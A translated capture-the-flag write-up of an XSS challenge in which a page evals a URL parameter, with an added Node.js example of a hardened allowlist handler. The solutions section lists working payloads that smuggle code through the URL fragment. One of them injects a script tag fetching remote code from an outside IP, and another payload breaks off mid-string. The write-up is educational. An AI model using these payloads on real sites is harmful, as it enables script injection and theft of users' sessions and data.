Beginning
I once came across an XSS challenge page posted by an expert: the task counts as solved once you execute XSS inside the iframe on the page. Address: http://server.n0tr00t.com/n0js/case2.html Criteria: Please execute the jscode in the iframe(name=hi): prompt location.href Work: Chrome, Firefox
case2.html
n0js case2
Please execute the jscode in the iframe(name=hi): prompt location.href Work: Chrome, Firefox Datetime: 2016-12-14
- Submit: evi1m0.bat[at]gmail.com
- Casetip: dota2 pudge
- Subject by: evi1m0 / server.n0tr00t.com
case2_test.html
Analysis
1. The JS in case2.html takes the value after "=" in the URL and passes it to eval.
2. The page loads the JS first and the iframe afterwards.
3. Single and double quotes passed in URL parameters get URL-encoded.
4. case2_test.html hints that userAgent might be usable.
5. Get to work.
Solution
1. The URL should have the form case2.html?test=payload.
2. Delay the execution of the JS; modify the browser's navigator.platform property; or bind a listener for the page's load event.
3. Characters such as single and double quotes after "#" in the URL are not encoded.
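As an added illustration (not code from the challenge page or its author), the Node.js snippet below models the sink described in points 1 and 3 of the analysis, shows the encoding asymmetry between the query string and the fragment with the WHATWG URL parser, and contrasts the eval-based pattern with a handler that maps the parameter onto a fixed allowlist of actions. The extraction logic, the example.invalid origin and the action names are assumptions for this example.

```javascript
// Added example, not the challenge's own code. Requires Node.js (WHATWG URL class).

// Model of the vulnerable extraction: everything after the first "=" in the URL.
// Assumed reconstruction of case2.html's logic; the challenge then calls eval()
// on this string. eval is deliberately not invoked anywhere in this example.
function extractSinkInput(href) {
  return href.slice(href.indexOf('=') + 1);
}

// What the URL parser does to a single quote: percent-encoded in the query,
// left untouched in the fragment. The fragment is also never sent to the server,
// so server-side filtering and access logs never see it.
function parsedParts(href) {
  const u = new URL(href);
  return { search: u.search, hash: u.hash };
}

// Hardened handler: parse the query with URLSearchParams, ignore the fragment,
// and look the parameter up in a fixed allowlist instead of evaluating it as code.
const ACTIONS = Object.freeze({
  greet: () => 'hello',          // assumed action names for the example
  time: () => 'clock shown',
});

function safeHandler(href) {
  const value = new URL(href).searchParams.get('test');
  // hasOwnProperty guards against inherited names such as "constructor"
  if (value === null || !Object.prototype.hasOwnProperty.call(ACTIONS, value)) {
    return null; // unknown or missing action: do nothing
  }
  return ACTIONS[value]();
}

// Constructed sample URLs in the shape the write-up describes.
const base = 'http://example.invalid/case2.html';
const sample = `${base}?a=location.hash.substr(1)#x='y'`;

console.log(extractSinkInput(sample));           // location.hash.substr(1)#x='y'
console.log(parsedParts(`${base}?a='x'#b='y'`)); // { search: "?a=%27x%27", hash: "#b='y'" }
console.log(safeHandler(`${base}?test=greet`));  // hello
console.log(safeHandler(sample));                // null
```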
case1: delayed JS execution
Solution 1: case2.html?a=location.hash.substr(1)#setTimeout("w=window['hi'];s=w.document.createElement('script');s.src='http://1.1.1.1/1.js';w.document.body.appendChild(s);", 2000) //@piaca
Solution 2: case2.html?a=location.hash.substr(1)#setTimeout("hi.eval('prompt(location.href)')",500) // @fyth
case2: modifying browser properties
Solution 1: case2.html?a=window.location.hash.substring(1)#Object.defineProperty(navigator,'userAgent',{get:function(){return '';}}) //@gaoheby
Solution 2: case2.html?a=location.hash.substr(1)#navigator.__defineGetter__('userAgent', function(){ return '
case3: listening for the page's load event
case2.html?test=location.hash.substr(1)#window.addEventListener('load', function(){window.hi.prompt(hi.location.href)})
Finally
The author's test page: http://server.n0tr00t.com/n0js/ The solutions above all come from that page; the author has since released another case, and anyone interested is welcome to go play and learn more. MDN's JavaScript documentation: https://developer.mozilla.org/zh-CN/docs/Web/JavaScript Study hard and improve every day; thanks to piaca & NorthOrchid.